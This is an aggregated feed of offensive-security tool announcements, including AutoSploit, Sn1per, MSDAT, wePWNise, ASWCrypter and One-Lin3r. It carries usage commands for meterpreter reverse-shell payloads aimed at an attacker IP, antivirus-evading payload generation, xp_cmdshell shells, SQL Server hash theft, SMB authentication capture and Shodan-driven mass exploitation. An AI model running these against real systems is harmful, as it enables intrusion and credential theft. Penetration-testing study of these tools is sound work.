The hijacking of port 445 to perform relay attacks or hash capturing attacks has been a recurring topic for a while now. When you infect a target with meterpreter, how do you listen on port 445? A few weeks ago this topic resurfaced again in part due to Dirk-jan (@_dirkjan) that saw this question flying … Continue reading “Remote NTLM relaying through meterpreter on Windows port 445"
Link: http://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445/
An Bash&Python Script For Generating Payloads that Bypasses All Antivirus so far [FUD].PLEASE DON’T UPLOAD BACKDOOT TO WWW.VIRUSTOTAL.COM ImportantThis Version Just for test , In future I will update ASWCrypter to generate a payloads for linux ,Mac and Windows . ;)Legal Disclamer:The author does not hold any responsibility for the bad use of this tool, remember this is only for educational purpose.Requirements1- Metasploit Framework 2- PythonGetting Startedgit clone https://github.com/AbedAlqaderSwedan1/ASWCrypter.gitcd ASWCrypterchmod +x setup.sh or chmod 777 setup.shScreenshotDownload ASWCrypter
Link: http://feedproxy.google.com/~r/PentestTools/~3/LBt2kOgRz1c/aswcrypter-bash-script-for-generating.html
wePWNise is proof-of-concept Python script which generates VBA code that can be used in Office macros or templates. It was designed with automation and integration in mind, targeting locked down environment scenarios. The tool enumerates Software Restriction Policies (SRPs) and EMET mitigations and dynamically identifies safe binaries to inject payloads into. wePWNise integrates with existing exploitation frameworks (e.g. Metasploit, Cobalt Strike) and it also accepts any custom payload in raw format.PrerequisitesPython termcolor package. To install run: pip install termcolorCommand line argumentsTo start using wePWNise, first take a look at the options it supports:usage: wepwnise.py [-h] -i86 -i64 <x64_shellcode> [–inject64] [–out <output_file>] [–msgbox] [–msg <window_message>]optional arguments: -h, –help show this help message and exit -i86 <x86_shellcode> Input x86 raw shellcode -i64 <x64_shellcode> Input x64 raw shellcode –inject64 Inject into 64 Bit. Set to False when delivering x86 payloads only. Default is True –out <output_file> File to output the VBA macro to –msgbox Present messagebox to prevent automated analysis. Default is True. –msg <window_message> Custom message to present the victim if –msgbox is set to TruewePWNise requires both 32 and 64 bit raw payloads in order to be able to deliver the appropriate type when it lands on an unknown target. However, if only an x86 architecture is targeted, a dummy 64 bit payload must be provided to replace the missing code.In order to defeat certain automated analysis configurations, a message box opens upon execution of the code. The text of the message box can be altered by defining its value in the –msg parameter. To disable this functionality set the –msgbox parameter to False.Due to performance conditions that may be introduced as a result of long SRPs/EMET policies, wePWNise reads two configuration files (binary-paths.txt and directory-paths.txt) that contain a list of executables and directories which are less likely to be monitored to be checked first. By editing the contents of those files the user can define their own choices instead. If the files are empty, wePWNise will directly start reading the SPRs/EMET policies as these would be defined within the Registry and make its injection choice purely based on the retrieved information.Usage examplesThe following sections describe some basic usage examples of wePWNise.Metasploit payloadsFirst the payloads for both x86 and x64 architectures in raw format and ensure that the Metasploit listeners are configured appropriately.$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -o /payloads/msf86.raw$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -a x86_64 -o /payloads/msf64.rawThen point wePWNise to the generated payloads and direct the output to msf_wepwn.txt$ wepwnise.py -i86 /payloads/msf86.raw -i64 /payloads/msf64.raw –out /payloads/msf_wepwn.txtCobalt Strike payloadsTo generate a raw payload in Cobalt Strike, navigate to the following menu and from the Output dropdown select the Raw format. Repeat the process and enable the x64 checkbox to produce a 64-bit payload.Attacks > Packages > Payload GeneratorEnter the generated payloads into wePWNise to generate the VBA code.$ wepwnise.py -i86 /payloads/cs86.raw -i64 /payloads/cs64.raw –msgbox False –out /payloads/cs_wepwn.txtCustom payloadsIn certain cases it may be the case that only an x86 payload be available. As wePWNise expects both a 32-bit and 64-bit payloads, in order to disable 64-bit injection create a dummy 64-bit file and set the –inject64 parameter to False.$ echo “+" > /payloads/dummy64.raw$ wepwnise.py -i86 /payloads/custom.raw -i64 /payloads/dummy64.raw –inject64 False –out /payloads/wepwn86.txtSimilarly, to generate 64-bit payloads only, create a dummy x86 file and supply it in wePWNise’s -i86 command line paramenter.Download wePWNise
Link: http://feedproxy.google.com/~r/PentestTools/~3/xnUJEXNmLbQ/wepwnise-generates-architecture.html
As the name might suggest AutoSploit attempts to automate the exploitation of remote hosts. Targets can be collected automatically through Shodan, Censys or Zoomeye. But options to add your custom targets and host lists have been included as well. The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions. Workspace, local host and local port for MSF facilitated back connections are configured by filling out the dialog that comes up before the exploit component is startedOperational Security ConsiderationReceiving back connections on your local machine might not be the best idea from an OPSEC standpoint. Instead consider running this tool from a VPS that has all the dependencies required, available.The new version of AutoSploit has a feature that allows you to set a proxy before you connect and a custom user-agent.Helpful linksUsageInstallingDependenciesUser Manual Extensive usage breakdownScreenshotsReporting bugs/ideasDevelopment guidelinesShoutoutsDevelopmentDiscord serverREADME translationsInstallationInstalling AutoSploit is very simple, you can find the latest stable release here. You can also download the master branch as a zip or tarball or follow one of the below methods;Cloningsudo -s << EOFgit clone https://github.com/NullArray/Autosploit.gitcd AutoSploitchmod +x install.sh./install.shpython2 autosploit.pyEOFDockersudo -s << EOFgit clone https://github.com/NullArray/AutoSploit.gitcd AutoSploitchmod +x install.sh./installshcd AutoSploit/Dockerdocker network create -d bridge haknetdocker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgresdocker build -t autosploit .docker run -it --network haknet -p 80:80 -p 443:443 -p 4444:4444 autosploitEOFOn any Linux system the following should work;git clone https://github.com/NullArray/AutoSploitcd AutoSploitchmod +x install.sh./install.shIf you want to run AutoSploit on a macOS system, AutoSploit is compatible with macOS, however, you have to be inside a virtual environment for it to run successfully. To do this, do the following;sudo -s << '_EOF'pip2 install virtualenv --usergit clone https://github.com/NullArray/AutoSploit.gitvirtualenv <PATH-TO-YOUR-ENV>source <PATH-TO-YOUR-ENV>/bin/activatecd <PATH-TO-AUTOSPLOIT>pip2 install -r requirements.txtchmod +x install.sh./install.shpython autosploit.py_EOFMore information on running Docker can be found hereUsageStarting the program with python autosploit.py will open an AutoSploit terminal session. The options for which are as follows.1. Usage And Legal2. Gather Hosts3. Custom Hosts4. Add Single Host5. View Gathered Hosts6. Exploit Gathered Hosts99. QuitChoosing option 2 will prompt you for a platform specific search query. Enter IIS or Apache in example and choose a search engine. After doing so the collected hosts will be saved to be used in the Exploit component.As of version 2.0 AutoSploit can be started with a number of command line arguments/flags as well. Type python autosploit.py -h to display all the options available to you. I’ve posted the options below as well for reference.usage: python autosploit.py -[c|z|s|a] -[q] QUERY [-C] WORKSPACE LHOST LPORT [-e] [–whitewash] PATH [–ruby-exec] [–msf-path] PATH [-E] EXPLOIT-FILE-PATH [–rand-agent] [–proxy] PROTO://IP:PORT [-P] AGENToptional arguments: -h, –help show this help message and exitsearch engines: possible search engines to use -c, –censys use censys.io as the search engine to gather hosts -z, –zoomeye use zoomeye.org as the search engine to gather hosts -s, –shodan use shodan.io as the search engine to gather hosts -a, –all search all available search engines to gather hostsrequests: arguments to edit your requests –proxy PROTO://IP:PORT run behind a proxy while performing the searches –random-agent use a random HTTP User-Agent header -P USER-AGENT, –personal-agent USER-AGENT pass a personal User-Agent to use for HTTP requests -q QUERY, –query QUERY pass your search queryexploits: arguments to edit your exploits -E PATH, –exploit-file PATH provide a text file to convert into JSON and save for later use -C WORKSPACE LHOST LPORT, –config WORKSPACE LHOST LPORT set the configuration for MSF (IE -C default 127.0.0.1 8080) -e, –exploit start exploiting the already gathered hostsmisc arguments: arguments that don’t fit anywhere else –ruby-exec if you need to run the Ruby executable with MSF use this –msf-path MSF-PATH pass the path to your framework if it is not in your ENV PATH –whitelist PATH only exploit hosts listed in the whitelist fileIf you want to run AutoSploit on a macOS system, AutoSploit is compatible with macOS, however, you have to be inside a virtual environment for it to run successfully. To do this, do the following;sudo -s << ‘_EOF’ pip2 install virtualenv –usergit clone https://github.com/NullArray/AutoSploit.gitvirtualenv <PATH-TO-YOUR-ENV>source <PATH-TO-YOUR-ENV>/bin/activatecd <PATH-TO-AUTOSPLOIT>pip2 install -r requirements.txtchmod +x install.sh./install.shpython autosploit.py_EOFDependenciesNote: All dependencies should be installed using the above installation method, however, if you find they are not:AutoSploit depends on the following Python2.7 modules.requestspsutilShould you find you do not have these installed get them with pip like so.pip install requests psutilorpip install -r requirements.txtSince the program invokes functionality from the Metasploit Framework you need to have this installed also. Get it from Rapid7 by clicking here.Download AutoSploit v2.2
Link: http://feedproxy.google.com/~r/PentestTools/~3/ZT_17-GzAcc/autosploit-v22-automated-mass-exploiter.html
PenTestIT RSS Feed
Since my last update, this router exploitation framework have gone through a lot of updates. This post is about RouterSploit 3.3.0 code named I Know You Were Trouble. We will also discuss changes made to and an earlier version 3.2.0 to maintain a chain with the hopes that I keep a watch on these coolRead more about UPDATED VERSION: RouterSploit 3.3.0
The post UPDATED VERSION: RouterSploit 3.3.0 appeared first on PenTestIT.
Link: http://pentestit.com/updated-version-routersploit-3-3-0/
PenTestIT RSS Feed
It has been some days since there was a lot of hue and cry about AutoSploit and eventually everything subsided. I wrote about it in a post titledAutoSploit = Shodan/Censys/Zoomeye + Metasploit too. Recently, an updated an improved updated version – AutoSploit 2.2 was released. This post will try to describe the changes between theRead more about UPDATED VERSION: AutoSploit 2.2
The post UPDATED VERSION: AutoSploit 2.2 appeared first on PenTestIT.
Link: http://feedproxy.google.com/~r/PenTestIT/~3/1YYxIzm27jk/
Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security’s premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.SN1PER PROFESSIONAL FEATURES:Professional reporting interfaceSlideshow for all gathered screenshotsSearchable and sortable DNS, IP and open port databaseCategorized host reportsQuick links to online recon tools and Google hacking queriesPersonalized notes field for each hostDEMO VIDEO:SN1PER COMMUNITY FEATURES: Automatically collects basic recon (ie. whois, ping, DNS, etc.) Automatically launches Google hacking queries against a target domain Automatically enumerates open ports via NMap port scanning Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers Automatically checks for sub-domain hijacking Automatically runs targeted NMap scripts against open ports Automatically runs targeted Metasploit scan and exploit modules Automatically scans all web applications for common vulnerabilities Automatically brute forces ALL open services Automatically test for anonymous FTP access Automatically runs WPScan, Arachni and Nikto for all web services Automatically enumerates NFS shares Automatically test for anonymous LDAP access Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities Automatically enumerate SNMP community strings, services and users Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers Automatically tests for open X11 servers Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds Performs high level enumeration of multiple hosts and subnets Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting Automatically gathers screenshots of all web sites Create individual workspaces to store all scan outputAUTO-PWN:Drupal Drupalgedon2 RCE CVE-2018-7600GPON Router RCE CVE-2018-10561Apache Struts 2 RCE CVE-2017-5638Apache Struts 2 RCE CVE-2017-9805Apache Jakarta RCE CVE-2017-5638Shellshock GNU Bash RCE CVE-2014-6271HeartBleed OpenSSL Detection CVE-2014-0160Default Apache Tomcat Creds CVE-2009-3843MS Windows SMB RCE MS08-067Webmin File Disclosure CVE-2006-3392Anonymous FTP AccessPHPMyAdmin Backdoor RCEPHPMyAdmin Auth BypassJBoss Java De-Serialization RCE’sKALI LINUX INSTALL:./install.shDOCKER INSTALL:Credits: @menzowDocker Install: https://github.com/menzow/sn1per-dockerDocker Build: https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/Example usage:$ docker pull menzo/sn1per-docker$ docker run –rm -ti menzo/sn1per-docker sniper menzo.ioUSAGE:[*] NORMAL MODEsniper -t|–target [*] NORMAL MODE + OSINT + RECONsniper -t|–target <TARGET> -o|–osint -re|–recon[*] STEALTH MODE + OSINT + RECONsniper -t|–target <TARGET> -m|–mode stealth -o|–osint -re|–recon[*] DISCOVER MODEsniper -t|–target <CIDR> -m|–mode discover -w|–workspace <WORSPACE_ALIAS>[*] SCAN ONLY SPECIFIC PORTsniper -t|–target <TARGET> -m port -p|–port <portnum>[*] FULLPORTONLY SCAN MODEsniper -t|–target <TARGET> -fp|–fullportonly[*] PORT SCAN MODEsniper -t|–target <TARGET> -m|–mode port -p|–port <PORT_NUM>[*] WEB MODE – PORT 80 + 443 ONLY!sniper -t|–target <TARGET> -m|–mode web[*] HTTP WEB PORT MODEsniper -t|–target <TARGET> -m|–mode webporthttp -p|–port <port>[*] HTTPS WEB PORT MODEsniper -t|–target <TARGET> -m|–mode webporthttps -p|–port <port>[*] ENABLE BRUTEFORCEsniper -t|–target <TARGET> -b|–bruteforce[*] AIRSTRIKE MODEsniper -f|–file /full/path/to/targets.txt -m|–mode airstrike[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLEDsniper -f–file /full/path/to/targets.txt -m|–mode nuke -w|–workspace <WORKSPACE_ALIAS>[*] ENABLE LOOT IMPORTING INTO METASPLOITsniper -t|–target <TARGET>[*] LOOT REIMPORT FUNCTIONsniper -w <WORKSPACE_ALIAS> –reimport[*] UPDATE SNIPERsniper -u|–updateMODES:NORMAL: Performs basic scan of targets and open ports using both active and passive checks for optimal performance.STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.FULLPORTONLY: Performs a full detailed port scan and saves results to XML.WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.WEBPORTHTTP: Launches a full HTTP web application scan against a specific host and port.WEBPORTHTTPS: Launches a full HTTPS web application scan against a specific host and port.UPDATE: Checks for updates and upgrades all components used by sniper.REIMPORT: Reimport all workspace files into Metasploit and reproduce all reports.RELOAD: Reload the master workspace report.SAMPLE REPORT:https://gist.github.com/1N3/8214ec2da2c91691bcbcDownload Sn1per v5.0
Link: http://feedproxy.google.com/~r/PentestTools/~3/Z_yHqaJ_y1U/sn1per-v50-automated-pentest-recon.html
It is very common during penetration tests where domain administrator access has been achieved to extract the password hashes of all the domain users for offline cracking and analysis. These hashes are stored in a database file in the domain controller (NTDS.DIT) with some additional information like group memberships and users. The NTDS.DIT file is […]
Link: https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/
MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.Usage examples of MSDAT:You have a Microsoft database listening remotely and you want to find valid credentials in order to connect to the databaseYou have a valid Microsoft SQL account on a database and you want to escalate your privilegesYou have a valid Microsoft SQL account and you want to execute commands on the operating system hosting this DB (xp_cmdshell)Tested on Microsof SQL database 2005, 2008 and 2012.ChangelogVersion 1.0 (2017/02/15) :first version realeasedFeaturesThanks to MSDAT (Microsoft SQL Database Attacking Tool), you can:get technical information (ex: database version) of a MSSQL database without to be authenticatedsearch MSSQL accounts with a dictionnary attacktest each login as password (authentication required)get a windows shell on the database server withxp_cmdshelldownload files remotely with:OLE Automationbulkinsertopenrowsetupload files on the server with:OLE Automationopenrowsetcapture a SMB authentication thanks to:bulkinsertopenrowsetxp_dirtreexp_fileexistxp-getfiledetailssteal MSSQL hashed password, on an any MSSQL versionscan ports through the database:openrowsetexecute SQL requests on a remote MSSQL server trough the database (target) with:bulkinsertopenrowsetlist files/directories with:xp_subdirsxp_dirtreelist drives/medias with:xp_fixeddrivesxp_availablemediacreate folder with:xp_create_subdirInstallationSome dependancies must be installed in order to run MSDAT.In ubuntu:sudo apt-get install freetds-dev or download freetds on http://www.freetds.org/sudo pip install cython colorlog termcolor pymssql argparsesudo pip install argcomplete && sudo activate-global-python-argcompleteAdd “use ntlmv2 = yes" in your freetds configuration file (ex: /etc/freetds/freetds.conf or /usr/local/etc/freetds.conf). Example:[global] # TDS protocol version tds version = 8.0 use ntlmv2 = yesExamplesModulesYou can list all modules:./msdat.py -hWhen you have chosen a module (example: all), you can use it and you can list all features and options of the module:./msdat.py all -hYou can know if a specific module can be used on a MSSQL server thanks to the –test-module option. This options is implemented in each mdat module.all moduleThe all module allows you to run all modules (depends on options that you have purchased).python msdat.py all -s $SERVERIf you want:to use your own account file for the dictionnary attacktry multiple passwords for a user without ask youto define your own timeout value./msdat.py all -s $SERVER -p $PORT –accounts-file accounts.txt –login-timeout 10 –force-retryIn each module, you can define the charset to use with the –charset option.mssqlinfo moduleTo get technical information about a remote MSSQL server without to be authenticated:./msdat.py mssqlinfo -s $SERVER -p $PORT –get-max-infoThis module uses TDS protocol and SQL browser Server to get information.passwordguesser moduleThis module allows you to search valid credentials :./msdat.py passwordguesser -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –force-retry –search–force-retry option allows to test multiple passwords for each user without ask youYou can specify your own account file with the –accounts-file option:./msdat.py passwordguesser -s $SERVER -p $PORT –search –accounts-file accounts.txt –force-retrypasswordstealer moduleTo dump hashed passwords :./msdat.py passwordstealer -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –dump –save-to-file test.txtThis modules has been tested on SQL Server 2000, 2005, 2008 and 2014.xpcmdshell moduleTo execute system commands thanks to xp_cmdshell (https://msdn.microsoft.com/en-us/library/ms190693.aspx):./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD –shellThis previous command give you an interactive shell on the remote database server.If xp_cmdshell is not enabled, the –enable-xpcmdshell can be used in this module to activate it:./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD –enable-xpcmdshell –disable-xpcmdshell –disable-xpcmdshell –shellThe –enable-xpcmdshell option enables xp_cmdshell if it is not enabled (not enabled by default).The –disable-xpcmdshell option disables xp_cmdshell if this one is enabled.smbauthcapture moduleThanks to this module, you can capture a SMB authentication:./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –capture $MY_IP_ADDRESS –share-name SHARETo capture the SMB authentication, the auxiliary/server/capture/smb (http://www.rapid7.com/db/modules/auxiliary/server/capture/smb) module of metasploit could be used:msf > use auxiliary/server/capture/smbmsf auxiliary(smb) > exploitThe capture command of this module tries to capture a SMB authentication thanks to xp_dirtree, xp_fileexist or xp-getfiledetails procedure.If you want to choose the SMB authentication procedure to capture the authentication:./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD –xp-dirtree-capture 127.0.0.1./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD –xp-fileexist-capture 127.0.0.1./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD –xp-getfiledetails-capture 127.0.0.1You can change the SHARE name with the –share-name option.oleautomation moduleThis module can be used to read/write file in the database server.The following command read the file temp.txt stored in the database server:./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –read-file ‘C:\Users\Administrator\Desktop\temp.txt’To write a string in a file (temp.txt) remotely:./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –write-file ‘C:\Users\Administrator\Desktop\temp.txt’ ‘a\nb\nc\nd\ne\nf’This module can be used to download a file (C:\Users\Administrator\Desktop\temp.txt) stored on the database server:./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –get-file ‘C:\Users\Administrator\Desktop\temp.txt’ temp.txtAlso, you can use this module to upload a file (temp.txt) on the target:./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –put-file temp.txt ‘C:\Users\Administrator\Desktop\temp.txtbulkopen moduleThe module bulkopen can be used :to read/download files stored on a database serverto scan ports through the database serverto execute SQL requests on a remote MSSQL server through the databaseTo read a file stored in the target, the following command can be used:./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –read-file ‘C:\Users\Administrator\Desktop\temp.txt’"The –method option can be used to specify the method to use:bulkinsert (https://msdn.microsoft.com/en-us/library/ms188365.aspx) oropenrowset(https://msdn.microsoft.com/en-us/library/ms190312.aspx)):./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –read-file ‘C:\Users\Administrator\Desktop\temp.txt’ –method openrowsetTo download a file (C:\Users\Administrator\Desktop\temp.txt):` “bash ./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –get-file ‘C:\Users\Administrator\Desktop\temp.txt’ temp.txtThis module can be used to scan ports (1433 and 1434 of 127.0.0.1) through the database server:“`bash./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –scan-ports 127.0.0.1 1433,1434 -vYou can scan a range of ports:./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –scan-ports 127.0.0.1 1433-1438This module can be used to execute SQL requests (ex: select @@ServerName) on a remote database server (ex: $SERVER2) through the database ($SERVER):./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –request-rdb $SERVER2 $PORT $DATABASE $USER $PASSWORD ‘select @@ServerName’xpdirectory moduleThe module xpdirectory can be used:to list:filesdirectoriesdrivesto check if a file existsto create a directoryTo list files in a specific directory:./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –list-files ‘C:\’To list directories in a specific directory:./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –list-dir ‘C:\’To list drives:./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –list-fixed-drives –list-available-mediaTo check if a file exist:./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –file-exists ‘C:\’ –file-exists ‘file.txt’To create a directory:./msdat.py xpdirectory –s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –create-dir ‘C:\temp’search moduleThe module search can be used to search a pattern in column names of tables and views. Usefull to search the pattern %password% in column names for example.To get column names which contains password patterns (ex: passwd, password, motdepasse, clave):./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –pwd-column-names –show-empty-columnsIf you want to see column names which doesn’t contain a data, you should use the option –show-empty-columns.To search a specific pattern in column names of views and tables:./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –pwd-column-names –show-empty-columnsDownload MSDAT
Link: http://feedproxy.google.com/~r/PentestTools/~3/ZIGtMzYR_7Q/msdat-microsoft-sql-database-attacking.html
One-Lin3r is simple and light-weight framework inspired by the web-delivery module in Metasploit.It consists of various one-liners that aids in penetration testing operations:Reverser: Give it IP & port and it returns a reverse shell liner ready for copy & paste.Dropper: Give it an uploaded-backdoor URL and it returns a download-&-execute liner ready for copy & paste.Other: Holds liners with the general purpose to help in penetration testing (ex: Mimikatz, Powerup, etc…) on the trending OSes (Windows, Linux, and macOS) “More OSes can be added too".FeaturesSearch for any one-liner in the database by its full name or partially.You can add your own liners by following these steps to create a ".liner" file. Also, you can send it to me directly and it will be added in the framework and credited with your name .Autocomplete any framework command and recommendations in case of typos (in case you love hacking like movies ).Command line arguments can be used to give the framework a resource file to load and execute for automation.The ability to reload the database if you added any liner without restarting the framework.You can add any platform to the payloads database just by making a folder in payloads folder and creating a ".liner" file there.More…The payloads database is not big now because this the first edition but it will get bigger with updates and contributions.ScreenshotsUsageCommandline argumentsusage: one-lin3r [-h] [-r R] [-x X] [-q]optional arguments: -h, –help show this help message and exit -r Execute a resource file (history file). -x Execute a specific command (use ; for multiples). -q Quit mode (no banner).Framework commandsCommand Description——– ————-help/? Show this help menulist/show List payloads you can use in the attack.search Search payloads for a specific oneuse <payload> Use an available payloadinfo <payload> Get information about an available payloadbanner Display bannerreload/refresh Reload the payloads databasecheck Prints the core version and database version then check for them online.history Display command line most important history from the beginningsave_history Save command line history to a fileexit/quit Exit the frameworkInstalling and requirementsTo make the tool work at its best you must have :Python 3.x or 2.x (preferred 3).Linux (Tested on kali rolling), Windows system, mac osx (tested on 10.11)The requirements mentioned in the next few lines.Installing+For windows : (After downloading ZIP and upzip it)python -m pip install ./One-Lin3r-masterone-lin3r -h+For Linux :git clone https://github.com/D4Vinci/One-Lin3r.gitapt-get install libncurses5-devpip install ./One-Lin3rone-lin3r -hUpdating the framework or the databaseOn Linux while outside the directorycd One-Lin3r && git pull && cd ..pip install ./One-Lin3r –upgradeOn Windows if you don’t have git installed, redownload the framework zipped!Download One-Lin3r
Link: http://feedproxy.google.com/~r/PentestTools/~3/elxDfxPSrg8/one-lin3r-v11-gives-you-one-liners-that.html
